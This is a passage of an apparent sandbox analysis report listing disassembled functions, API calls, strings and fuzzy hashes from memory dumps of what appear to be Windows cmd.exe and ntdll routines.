                                    • Instruction Fuzzy Hash: 1BE09232A4461267EE3476F97C1DF862E949B94B39F114448FB85CA0C4DE20C4C08BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F9897, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F98A3
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,011F3811,?,?,00000001,?), ref: 011F98AB
                                    • _get_osfhandle.MSVCRT ref: 011F98C1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F3811,?,?,00000001,?), ref: 011F98C9
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction ID: dad0fbfef5491f2ff70b8b154ce74b5d15a43aeff037ec27626b183b96b7690e
                                    • Opcode Fuzzy Hash: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction Fuzzy Hash: 1BE01A72900609EBEF20DBA5E81EBAA7B6CEB00325F100956F915C61C1DE71DA809B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4C00, Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E4C19
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C21
                                    • _get_osfhandle.MSVCRT ref: 011E4C2F
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C37
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction ID: ec6dbe24701a0c3c265431f4d6d29991e6dcf2e7dd235b3d323c8d355a4eef70
                                    • Opcode Fuzzy Hash: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction Fuzzy Hash: 03E0BDB2A00201EFEF2ADBA0F81EB547BB5F718305B001A9AF1118318ADBB1A580DB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DACD5, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,011DACAB), ref: 011DACDE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACE5
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACEE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACF5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                    • Instruction ID: 316ab2fa5e4eda9d2893ef8daea3b0ef5cd291242f6a99c940100309ea334011
                                    • Opcode Fuzzy Hash: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                    • Instruction Fuzzy Hash: 46D09232804110ABDE607BA1B81DBC63A28EB59226F110449FA4582048CEB088C08B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                      • Part of subcall function 011DEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                      • Part of subcall function 011DEEF0: RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                      • Part of subcall function 011DEEF0: _setjmp3.MSVCRT ref: 011DEFA5
                                    • _wcsupr.MSVCRT ref: 011F0A16
                                      • Part of subcall function 011E2ABE: memset.MSVCRT ref: 011E2B59
                                      • Part of subcall function 011E2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 011E2C13
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                    • String ID: FOR$ IF
                                    • API String ID: 3818062306-2924197646
                                    • Opcode ID: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                    • Instruction ID: bdd056f49abe3a42dbb47cc429709a94b2f7332799ef172122c85a4215c72833
                                    • Opcode Fuzzy Hash: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                    • Instruction Fuzzy Hash: 5051383570020386EB3EAB6C981477B6293EF9861CB55412DEB068B296FF71D985C381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011FB377
                                    • memcpy.MSVCRT ref: 011FB3F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$AllocProcessmemcpywcschr
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 3241892172-381716982
                                    • Opcode ID: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                    • Instruction ID: a4968a7c3d17b64c3cab38cdff0da4d815c3be77eff07a2c7b1b08b394f56e1c
                                    • Opcode Fuzzy Hash: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                    • Instruction Fuzzy Hash: 6C614DB0E08219CBCF2CCFA9E5945BDBBF1FB48314B25412EEA16E7254D7709941CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DDE4F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DDE60
                                      • Part of subcall function 011DF300: _setjmp3.MSVCRT ref: 011DF318
                                      • Part of subcall function 011DF300: iswspace.MSVCRT ref: 011DF35B
                                      • Part of subcall function 011DF300: wcschr.MSVCRT ref: 011DF37D
                                      • Part of subcall function 011DF300: iswdigit.MSVCRT ref: 011DF3DE
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011EBCF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
                                    • String ID: REM/?
                                    • API String ID: 1631155197-4093888634
                                    • Opcode ID: c20010826fabd0c9a5c13c1458c966a1aafad18b07b7e2008b45c3bae48bcc55
                                    • Instruction ID: 3cd621842b3b1623e8b5610aff48c39ddc5880ce92bb9f8b570f225bb38cbc88
                                    • Opcode Fuzzy Hash: c20010826fabd0c9a5c13c1458c966a1aafad18b07b7e2008b45c3bae48bcc55
                                    • Instruction Fuzzy Hash: FF21F5223943129BEB3DAAB6B909B372291DF90655F15442FE602CB1C1EFB088428315
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC120,0000001C,011F5CB1), ref: 011F4A58
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F4B28
                                      • Part of subcall function 011F587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                      • Part of subcall function 011F587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                      • Part of subcall function 011F587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$Close$CreateOpenValueiswspace
                                    • String ID: Software\Classes
                                    • API String ID: 1047774138-1656466771
                                    • Opcode ID: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                    • Instruction ID: 16bbcc11c1592b2cd443cb292c473e01d7bef75e1f1bba585d0fb4a715f4daad
                                    • Opcode Fuzzy Hash: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                    • Instruction Fuzzy Hash: CF319371F0421ACBDF1CEBF99854AAEB6B1AF98608F10406DD202BB691EB704900CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F51C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC0C0,0000001C,011F5CE1), ref: 011F51F4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F52BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$CloseOpeniswspace
                                    • String ID: Software\Classes
                                    • API String ID: 2439148603-1656466771
                                    • Opcode ID: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                    • Instruction ID: 188134ed55947d5e37ba7f7e500ab3202b526c03b3a4153a5a2b73b58eeda4e9
                                    • Opcode Fuzzy Hash: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                    • Instruction Fuzzy Hash: 8E21B475E04306CBDF5CEBF9D8546ADB6F2AF98618F11812DE502BB294EB704D01CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,011E0B7F), ref: 011ECDDF
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 011ECE81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleTitle
                                    • String ID: -
                                    • API String ID: 3358957663-3695764949
                                    • Opcode ID: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                    • Instruction ID: bce5c884affaa0be082da193b3b4460890e0cb0b0d94b9947ffa115a1213973f
                                    • Opcode Fuzzy Hash: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                    • Instruction Fuzzy Hash: 3421E47270090167CB2D9BECE85C7BE7EF2AB84714F19412CD91697249EF315946CBC2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F8430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F8459
                                    • printf.MSVCRT ref: 011F84B4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                    • String ID: %3d
                                    • API String ID: 2845598586-2138283368
                                    • Opcode ID: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                    • Instruction ID: 6f424aa0bbd4063a4a801d53f52ded861282c6af39b1cd7a6efb9a8359747c55
                                    • Opcode Fuzzy Hash: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                    • Instruction Fuzzy Hash: C3012DB1650105BFFB286BA59C89FEB3EEDDBA5BA4F00401CFB0855080D7B19850C2B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E72B5: __EH_prolog3_catch.LIBCMT ref: 011E7650
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                    • memset.MSVCRT ref: 011E0CDD
                                    Strings
                                    • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 011ECD51
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: H_prolog3_catchmemset
                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                    • API String ID: 620422817-3416068913
                                    • Opcode ID: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                    • Instruction ID: e158b470713e9f8187c53dfda88aa9db20da53aef0ddbfa8dd8e52c343665afc
                                    • Opcode Fuzzy Hash: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                    • Instruction Fuzzy Hash: 7A01D871300705ABE72C86F99C8DB6BB6D9EB94250F04053DF556D7240DBF6EC51C2A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AFFDFA
                                    Strings
                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AFFE2B
                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AFFE01
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                    • API String ID: 885266447-3903918235
                                    • Opcode ID: ef3e23e53a0930a75bfa186da23c26120bc593f99ee54e37bd949c2ce1ef48fe
                                    • Instruction ID: 14cada58eb8370793131ac08b940913de924bfe143da9839d1c60fc9bc4a19ae
                                    • Opcode Fuzzy Hash: ef3e23e53a0930a75bfa186da23c26120bc593f99ee54e37bd949c2ce1ef48fe
                                    • Instruction Fuzzy Hash: 3DF021375406017FD6205A85DD05F27BF5AEB45730F140716F7245A6D1DA62F83087F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DDEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: iswspacewcschr
                                    • String ID: =,;
                                    • API String ID: 287713880-1539845467
                                    • Opcode ID: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                    • Instruction ID: db932e6896e5513591f390be794c8b091ebc46a050c7d1fd813f3b29e87dfa73
                                    • Opcode Fuzzy Hash: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                    • Instruction Fuzzy Hash: D3E04F37608522925F3D0BDEB9599779ED9CAE6A2531B01AFF900D31C0EB6188438293
                                    Uniqueness

                                    Uniqueness Score: -1.00%